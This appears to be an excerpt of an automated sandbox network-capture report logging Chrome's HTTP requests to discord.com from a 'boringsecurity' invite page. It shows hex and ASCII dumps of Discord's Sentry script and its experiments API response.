                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 65 64 22 2c 22 61 70 70 22 2c 22 39 34 22 2c 22 34 34 35 33 32 22 5d 2c 32 31 30 35 36 35 3a 5b 22 32 36 34 38 35 22 5d 2c 32 31 33 36 37 3a 5b 22 73 68 61 72 65 64 22 2c 22 61 70 70 22 2c 22 32 34 34 33 39 22 2c 22 35 33 32 36 35 22 2c 22 38 30 38 31 33 22 2c 22 39 36 34 35 35 22 5d 2c 32 31 37 30 31 34 3a 5b 22 61 70 70 22 5d 2c 32 32 30 37 39 32 3a 5b 22 32 35 30 39 39 22 5d 2c 32 32 31 35 33 33 3a 5b 22 36 34 30 33 31 22 5d 2c 32 32 33 39 39 33 3a 5b 22 61 70 70 22 2c 22 39 39 35 39 39 22 5d 2c 32 32 34 35 34 38 3a 5b 22 32 34 33 34 33 22 5d 2c 32 32 34 39 31 35 3a 5b 22 33 31 38 39 37 22 2c 22 35 38 34 30 39 22 2c 22 33 33 34 31 22 2c 22 33 39 37 30 33 22 5d 2c 32 32 35 36 32 39 3a 5b 22 32 32 38 34 33 22 2c 22 32 35 32 38 35 22 5d 2c 32 32 35 39 33
                                                                          Data Ascii: ed","app","94","44532"],210565:["26485"],21367:["shared","app","24439","53265","80813","96455"],217014:["app"],220792:["25099"],221533:["64031"],223993:["app","99599"],224548:["24343"],224915:["31897","58409","3341","39703"],225629:["22843","25285"],22593


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          326192.168.2.550062162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:19 UTC867OUTGET /assets/sentry.14a93a5009fad9a88b94.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=yGTmYPp_hqj1hDyRzyJ50GPMN3nfg__GZhDiRBd5Tlw-1702226719273-0-604800000
                                                                          2023-12-10 16:45:19 UTC970INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 30 31 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 32 36 65 62 37 31 39 61 65 66 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:19 GMTContent-Type: application/javascriptContent-Length: 8013Connection: closeCF-Ray: 8336f526eb719aef-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:19 UTC399INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 3d 7b 33 37 30 36 39 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 28 22 39 31 38 34 33 37 22 29 28 22 46 6c 6f 61 74 33 32 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 74 28 74 68 69 73 2c 65 2c 6e 2c 72 29 7d 7d 29 7d 2c 36 36 37 35 30 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 28 22 39 31 38 34 33 37 22 29 28 22 46 6c 6f 61 74 36 34 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 74 28 74 68 69 73 2c 65 2c 6e 2c 72 29 7d 7d 29
                                                                          Data Ascii: !function(){var t,e={370692:function(t,e,n){"use strict";n("918437")("Float32",function(t){return function(e,n,r){return t(this,e,n,r)}})},667500:function(t,e,n){"use strict";n("918437")("Float64",function(t){return function(e,n,r){return t(this,e,n,r)}})
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 65 20 73 74 72 69 63 74 22 3b 6e 28 22 39 31 38 34 33 37 22 29 28 22 49 6e 74 33 32 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 74 28 74 68 69 73 2c 65 2c 6e 2c 72 29 7d 7d 29 7d 2c 34 35 33 30 36 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 28 22 39 31 38 34 33 37 22 29 28 22 49 6e 74 38 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 74 28 74 68 69 73 2c 65 2c 6e 2c 72 29 7d 7d 29 7d 2c 36 35 39 35 31 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 28 22 39 31 38 34 33 37 22 29 28 22 55
                                                                          Data Ascii: e strict";n("918437")("Int32",function(t){return function(e,n,r){return t(this,e,n,r)}})},453061:function(t,e,n){"use strict";n("918437")("Int8",function(t){return function(e,n,r){return t(this,e,n,r)}})},659510:function(t,e,n){"use strict";n("918437")("U
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 28 28 6f 3d 3d 3d 73 7c 7c 21 6f 29 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 29 72 65 74 75 72 6e 20 6f 3d 63 6c 65 61 72 54 69 6d 65 6f 75 74 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 29 3b 74 72 79 7b 6f 28 74 29 7d 63 61 74 63 68 28 65 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6f 2e 63 61 6c 6c 28 6e 75 6c 6c 2c 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 6f 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 7d 7d 7d 28 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 28 74 2c 65 29 7b 74 68 69 73 2e 66 75 6e 3d 74 2c 74 68 69 73 2e 61 72 72 61 79 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 29 7b 7d 75 2e 6e 65 78 74 54 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 41 72 72 61 79 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 31 29
                                                                          Data Ascii: ((o===s||!o)&&clearTimeout)return o=clearTimeout,clearTimeout(t);try{o(t)}catch(e){try{return o.call(null,t)}catch(e){return o.call(this,t)}}}(t)}}function b(t,e){this.fun=t,this.array=e}function m(){}u.nextTick=function(t){var e=Array(arguments.length-1)
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 69 63 45 76 65 6e 74 73 2e 45 58 50 45 52 49 4d 45 4e 54 5f 47 55 49 4c 44 5f 54 52 49 47 47 45 52 45 44 5d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 6c 65 74 7b 6d 61 78 42 75 64 67 65 74 4d 69 6e 75 74 65 3a 65 2c 6d 61 78 42 75 64 67 65 74 48 6f 75 72 3a 6e 7d 3d 74 2c 72 3d 7b 6d 69 6e 75 74 65 3a 7b 73 6c 6f 74 3a 30 2c 62 75 64 67 65 74 55 73 65 64 3a 30 7d 2c 68 6f 75 72 3a 7b 73 6c 6f 74 3a 30 2c 62 75 64 67 65 74 55 73 65 64 3a 30 7d 7d 3b 72 65 74 75 72 6e 28 29 3d 3e 7b 6c 65 74 20 74 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 6f 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 2f 31 65 33 2f 36 30 29 2c 69 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 2f 31 65 33 2f 36 30 2f 36 30 29 3b 72 65 74 75 72 6e 20 72 2e 6d 69 6e 75 74 65 2e 73 6c 6f 74 21 3d 3d 6f 26 26
                                                                          Data Ascii: icEvents.EXPERIMENT_GUILD_TRIGGERED];function i(t){let{maxBudgetMinute:e,maxBudgetHour:n}=t,r={minute:{slot:0,budgetUsed:0},hour:{slot:0,budgetUsed:0}};return()=>{let t=Date.now(),o=Math.round(t/1e3/60),i=Math.round(t/1e3/60/60);return r.minute.slot!==o&&
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 56 65 72 73 69 6f 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 74 29 3e 3d 30 29 29 26 26 21 75 28 29 26 26 21 28 22 41 62 6f 72 74 65 64 22 3d 3d 3d 28 6e 3d 74 29 2e 6d 65 73 73 61 67 65 7c 7c 22 63 61 6e 63 65 6c 20 63 61 70 74 63 68 61 22 3d 3d 3d 6e 2e 6d 65 73 73 61 67 65 29 26 26 63 28 29 3f 74 3a 6e 75 6c 6c 7d 2c 69 6e 74 65 67 72 61 74 69 6f 6e 73 3a 5b 6e 65 77 20 72 2e 49 6e 74 65 67 72 61 74 69 6f 6e 73 2e 47 6c 6f 62 61 6c 48 61 6e 64 6c 65 72 73 28 7b 6f 6e 65 72 72 6f 72 3a 21 30 2c 6f 6e 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 3a 21 30 7d 29 2c 6e 65 77 20 72 2e 49 6e 74 65 67 72 61 74 69 6f 6e 73 2e 42 72 65 61 64 63 72 75 6d 62 73 28 7b 63 6f 6e 73 6f 6c 65 3a 21 30 2c 64 6f 6d 3a 21 30 2c 66 65
                                                                          Data Ascii: Version.toLowerCase().indexOf(t)>=0))&&!u()&&!("Aborted"===(n=t).message||"cancel captcha"===n.message)&&c()?t:null},integrations:[new r.Integrations.GlobalHandlers({onerror:!0,onunhandledrejection:!0}),new r.Integrations.Breadcrumbs({console:!0,dom:!0,fe
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 6e 20 6f 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 6e 5b 74 5d 3d 7b 69 64 3a 74 2c 6c 6f 61 64 65 64 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 74 5d 28 69 2c 69 2e 65 78 70 6f 72 74 73 2c 72 29 2c 69 2e 6c 6f 61 64 65 64 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 72 2e 6d 3d 65 2c 72 2e 65 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 64 65 66 61 75 6c 74 22 21 3d 3d 6e 26 26 21 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 6e 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 7b 65 6e
                                                                          Data Ascii: n o.exports;var i=n[t]={id:t,loaded:!1,exports:{}};return e[t](i,i.exports,r),i.loaded=!0,i.exports}r.m=e,r.es=function(t,e){return Object.keys(t).forEach(function(n){"default"!==n&&!Object.prototype.hasOwnProperty.call(e,n)&&Object.defineProperty(e,n,{en
                                                                          2023-12-10 16:45:19 UTC769INData Raw: 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 65 78 70 6f 72 74 73 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 45 53 20 4d 6f 64 75 6c 65 73 20 6d 61 79 20 6e 6f 74 20 61 73 73 69 67 6e 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 6f 72 20 65 78 70 6f 72 74 73 2e 2a 2c 20 55 73 65 20 45 53 4d 20 65 78 70 6f 72 74 20 73 79 6e 74 61 78 2c 20 69 6e 73 74 65 61 64 3a 20 22 2b 74 2e 69 64 29 7d 7d 29 2c 74 7d 2c 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 73 65 6e 74 72 79 3a 30 7d 3b 72 2e 4f 2e 6a 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 30 3d 3d 3d 74 5b 65 5d 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74
                                                                          Data Ascii: ),Object.defineProperty(t,"exports",{enumerable:!0,set:function(){throw Error("ES Modules may not assign module.exports or exports.*, Use ESM export syntax, instead: "+t.id)}}),t},!function(){var t={sentry:0};r.O.j=function(e){return 0===t[e]};var e=funct


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          327192.168.2.550063162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:21 UTC1627OUTGET /api/v9/experiments?with_guild_experiments=true HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                          X-Context-Properties: eyJsb2NhdGlvbiI6IkFjY2VwdCBJbnZpdGUgUGFnZSJ9
                                                                          X-Debug-Options: bugReporterEnabled
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Discord-Timezone: Europe/Zurich
                                                                          X-Discord-Locale: en-US
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
                                                                          2023-12-10 16:45:21 UTC775INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 3b 20 70 72 65 6c 6f 61 64 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 76 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:21 GMTContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closestrict-transport-security: max-age=31536000; includeSubDomains; preloadvary: Accept-Encodingvia: 1.1 googleAlt-Svc:
                                                                          2023-12-10 16:45:21 UTC594INData Raw: 31 39 65 62 0d 0a 7b 22 66 69 6e 67 65 72 70 72 69 6e 74 22 3a 22 31 31 38 33 34 34 39 33 38 36 38 39 34 37 37 30 33 31 37 2e 69 6d 73 33 74 6d 6f 38 75 5a 4b 4c 46 50 47 32 51 34 77 51 43 6c 77 33 57 61 73 22 2c 22 61 73 73 69 67 6e 6d 65 6e 74 73 22 3a 5b 5b 34 31 33 30 38 33 37 31 39 30 2c 30 2c 31 30 2c 2d 31 2c 30 2c 32 33 33 39 2c 30 2c 30 5d 2c 5b 34 31 38 31 34 31 37 39 33 39 2c 30 2c 31 2c 2d 31 2c 36 2c 34 36 34 34 2c 30 2c 30 5d 2c 5b 32 38 31 30 32 30 35 34 38 37 2c 31 2c 31 2c 2d 31 2c 33 2c 35 33 39 39 2c 30 2c 30 5d 2c 5b 33 33 31 36 37 32 30 37 31 31 2c 30 2c 31 2c 2d 31 2c 31 2c 37 36 36 37 2c 30 2c 30 5d 2c 5b 31 35 36 35 39 30 34 33 31 2c 30 2c 31 2c 2d 31 2c 32 2c 39 36 30 39 2c 30 2c 30 5d 2c 5b 32 36 31 37 32 31 38 34 34 34 2c 34 2c
                                                                          Data Ascii: 19eb{"fingerprint":"1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was","assignments":[[4130837190,0,10,-1,0,2339,0,0],[4181417939,0,1,-1,6,4644,0,0],[2810205487,1,1,-1,3,5399,0,0],[3316720711,0,1,-1,1,7667,0,0],[156590431,0,1,-1,2,9609,0,0],[2617218444,4,
                                                                          2023-12-10 16:45:21 UTC1369INData Raw: 2c 2d 31 2c 30 2c 35 38 34 36 2c 30 2c 30 5d 2c 5b 32 34 38 36 35 39 31 33 31 36 2c 30 2c 31 2c 2d 31 2c 31 2c 37 34 33 30 2c 30 2c 30 5d 2c 5b 32 35 34 32 36 33 34 31 39 34 2c 30 2c 31 2c 2d 31 2c 30 2c 31 31 37 39 2c 30 2c 30 5d 2c 5b 33 34 35 30 38 39 39 30 38 38 2c 31 2c 31 2c 2d 31 2c 30 2c 33 30 31 39 2c 30 2c 30 5d 2c 5b 33 36 35 36 37 39 36 34 36 30 2c 33 2c 30 2c 2d 31 2c 33 2c 31 36 32 35 2c 30 2c 30 5d 2c 5b 31 31 37 36 37 36 39 37 30 32 2c 31 2c 31 2c 2d 31 2c 32 2c 35 32 32 31 2c 30 2c 30 5d 2c 5b 32 35 31 39 32 38 38 35 36 38 2c 30 2c 31 2c 2d 31 2c 34 2c 35 30 31 34 2c 30 2c 30 5d 2c 5b 31 38 31 34 34 38 33 32 39 30 2c 30 2c 31 2c 2d 31 2c 30 2c 38 35 38 38 2c 30 2c 30 5d 2c 5b 34 32 32 31 30 30 36 37 32 36 2c 30 2c 31 2c 2d 31 2c 30 2c 37
                                                                          Data Ascii: ,-1,0,5846,0,0],[2486591316,0,1,-1,1,7430,0,0],[2542634194,0,1,-1,0,1179,0,0],[3450899088,1,1,-1,0,3019,0,0],[3656796460,3,0,-1,3,1625,0,0],[1176769702,1,1,-1,2,5221,0,0],[2519288568,0,1,-1,4,5014,0,0],[1814483290,0,1,-1,0,8588,0,0],[4221006726,0,1,-1,0,7
                                                                          2023-12-10 16:45:21 UTC1369INData Raw: 2c 30 5d 2c 5b 32 35 33 39 35 34 30 32 35 36 2c 30 2c 31 2c 2d 31 2c 33 2c 39 38 35 36 2c 30 2c 30 5d 2c 5b 33 34 36 38 39 30 33 39 38 2c 36 2c 33 2c 2d 31 2c 31 2c 38 37 33 34 2c 30 2c 30 5d 2c 5b 33 39 39 31 32 39 38 34 34 39 2c 32 2c 31 2c 2d 31 2c 32 2c 35 39 38 34 2c 30 2c 30 5d 2c 5b 34 37 32 39 37 35 34 30 30 2c 36 2c 31 2c 2d 31 2c 30 2c 38 36 39 34 2c 30 2c 30 5d 2c 5b 31 37 39 34 38 37 34 32 32 37 2c 32 2c 31 2c 2d 31 2c 30 2c 35 39 31 35 2c 30 2c 30 5d 2c 5b 31 30 32 36 39 30 37 32 30 2c 30 2c 32 2c 2d 31 2c 36 2c 36 35 36 32 2c 30 2c 30 5d 2c 5b 31 35 30 33 33 36 34 32 38 35 2c 30 2c 31 2c 2d 31 2c 31 2c 32 32 34 38 2c 30 2c 30 5d 2c 5b 31 35 34 39 35 34 33 39 35 38 2c 32 2c 31 2c 2d 31 2c 30 2c 33 37 33 2c 30 2c 30 5d 2c 5b 32 33 31 30 33 33
                                                                          Data Ascii: ,0],[2539540256,0,1,-1,3,9856,0,0],[346890398,6,3,-1,1,8734,0,0],[3991298449,2,1,-1,2,5984,0,0],[472975400,6,1,-1,0,8694,0,0],[1794874227,2,1,-1,0,5915,0,0],[102690720,0,2,-1,6,6562,0,0],[1503364285,0,1,-1,1,2248,0,0],[1549543958,2,1,-1,0,373,0,0],[231033
                                                                          2023-12-10 16:45:21 UTC1369INData Raw: 33 32 2c 30 2c 30 5d 2c 5b 33 37 33 35 33 31 31 35 36 2c 30 2c 33 2c 2d 31 2c 30 2c 39 39 31 39 2c 30 2c 30 5d 2c 5b 32 34 32 39 32 31 36 30 35 39 2c 30 2c 31 2c 2d 31 2c 30 2c 31 34 37 2c 30 2c 30 5d 2c 5b 34 30 31 38 30 34 32 36 38 36 2c 30 2c 31 2c 2d 31 2c 30 2c 33 31 35 34 2c 30 2c 30 5d 2c 5b 36 30 34 36 36 35 35 2c 30 2c 31 2c 2d 31 2c 30 2c 38 33 39 34 2c 30 2c 30 5d 2c 5b 31 36 31 37 37 34 39 37 34 33 2c 30 2c 31 2c 2d 31 2c 30 2c 38 36 37 35 2c 30 2c 30 5d 2c 5b 32 39 33 37 33 32 39 39 31 30 2c 31 2c 31 2c 2d 31 2c 32 2c 36 36 39 35 2c 30 2c 30 5d 2c 5b 33 36 39 39 30 32 30 34 35 35 2c 30 2c 31 2c 2d 31 2c 30 2c 35 31 39 32 2c 30 2c 30 5d 2c 5b 33 37 34 32 32 36 39 31 39 31 2c 30 2c 31 2c 2d 31 2c 30 2c 35 39 36 37 2c 30 2c 30 5d 2c 5b 32 36 31
                                                                          Data Ascii: 32,0,0],[373531156,0,3,-1,0,9919,0,0],[2429216059,0,1,-1,0,147,0,0],[4018042686,0,1,-1,0,3154,0,0],[6046655,0,1,-1,0,8394,0,0],[1617749743,0,1,-1,0,8675,0,0],[2937329910,1,1,-1,2,6695,0,0],[3699020455,0,1,-1,0,5192,0,0],[3742269191,0,1,-1,0,5967,0,0],[261
                                                                          2023-12-10 16:45:21 UTC1369INData Raw: 31 2c 2d 31 2c 30 2c 39 37 36 31 2c 30 2c 30 5d 2c 5b 33 32 31 35 31 37 30 32 30 38 2c 30 2c 32 2c 2d 31 2c 30 2c 38 37 33 34 2c 30 2c 30 5d 2c 5b 33 34 39 35 37 38 39 38 32 30 2c 30 2c 31 2c 2d 31 2c 32 2c 36 38 39 38 2c 30 2c 30 5d 2c 5b 31 33 35 35 30 33 30 30 34 2c 30 2c 31 2c 2d 31 2c 30 2c 34 31 32 31 2c 30 2c 30 5d 2c 5b 31 38 38 34 34 32 36 34 37 31 2c 30 2c 31 2c 2d 31 2c 30 2c 37 35 35 37 2c 30 2c 30 5d 2c 5b 33 32 30 35 30 32 37 35 35 36 2c 30 2c 31 2c 2d 31 2c 32 2c 34 30 38 33 2c 30 2c 30 5d 2c 5b 32 38 30 34 36 33 31 30 35 34 2c 30 2c 31 2c 2d 31 2c 34 2c 38 39 38 31 2c 30 2c 30 5d 2c 5b 33 33 30 37 34 34 31 38 31 30 2c 36 2c 30 2c 2d 31 2c 30 2c 34 37 38 2c 30 2c 31 5d 2c 5b 38 37 33 39 31 30 35 34 33 2c 31 2c 31 2c 2d 31 2c 30 2c 39 37 37
                                                                          Data Ascii: 1,-1,0,9761,0,0],[3215170208,0,2,-1,0,8734,0,0],[3495789820,0,1,-1,2,6898,0,0],[135503004,0,1,-1,0,4121,0,0],[1884426471,0,1,-1,0,7557,0,0],[3205027556,0,1,-1,2,4083,0,0],[2804631054,0,1,-1,4,8981,0,0],[3307441810,6,0,-1,0,478,0,1],[873910543,1,1,-1,0,977
                                                                          2023-12-10 16:45:21 UTC573INData Raw: 2c 5b 35 33 37 36 34 39 34 35 30 2c 31 2c 30 2c 2d 31 2c 32 2c 39 34 2c 30 2c 30 5d 2c 5b 33 39 35 30 38 34 37 35 33 37 2c 32 2c 31 2c 2d 31 2c 30 2c 38 32 37 39 2c 30 2c 30 5d 2c 5b 33 39 32 37 31 34 35 37 39 37 2c 30 2c 31 2c 2d 31 2c 33 2c 34 39 39 2c 30 2c 30 5d 2c 5b 32 32 34 30 30 39 38 30 32 35 2c 30 2c 31 2c 2d 31 2c 30 2c 36 33 31 39 2c 30 2c 31 5d 2c 5b 34 30 30 38 31 37 34 37 39 35 2c 32 2c 32 2c 2d 31 2c 31 2c 39 39 31 38 2c 30 2c 30 5d 2c 5b 32 35 33 38 35 39 31 30 37 37 2c 30 2c 31 2c 2d 31 2c 36 2c 36 36 35 30 2c 30 2c 30 5d 2c 5b 35 33 38 38 34 30 31 38 37 2c 32 2c 30 2c 2d 31 2c 30 2c 32 30 37 2c 30 2c 30 5d 2c 5b 32 31 38 38 33 33 37 38 30 34 2c 30 2c 31 2c 2d 31 2c 30 2c 39 33 39 32 2c 30 2c 30 5d 2c 5b 32 32 30 37 32 36 31 36 38 37 2c
                                                                          Data Ascii: ,[537649450,1,0,-1,2,94,0,0],[3950847537,2,1,-1,0,8279,0,0],[3927145797,0,1,-1,3,499,0,0],[2240098025,0,1,-1,0,6319,0,1],[4008174795,2,2,-1,1,9918,0,0],[2538591077,0,1,-1,6,6650,0,0],[538840187,2,0,-1,0,207,0,0],[2188337804,0,1,-1,0,9392,0,0],[2207261687,
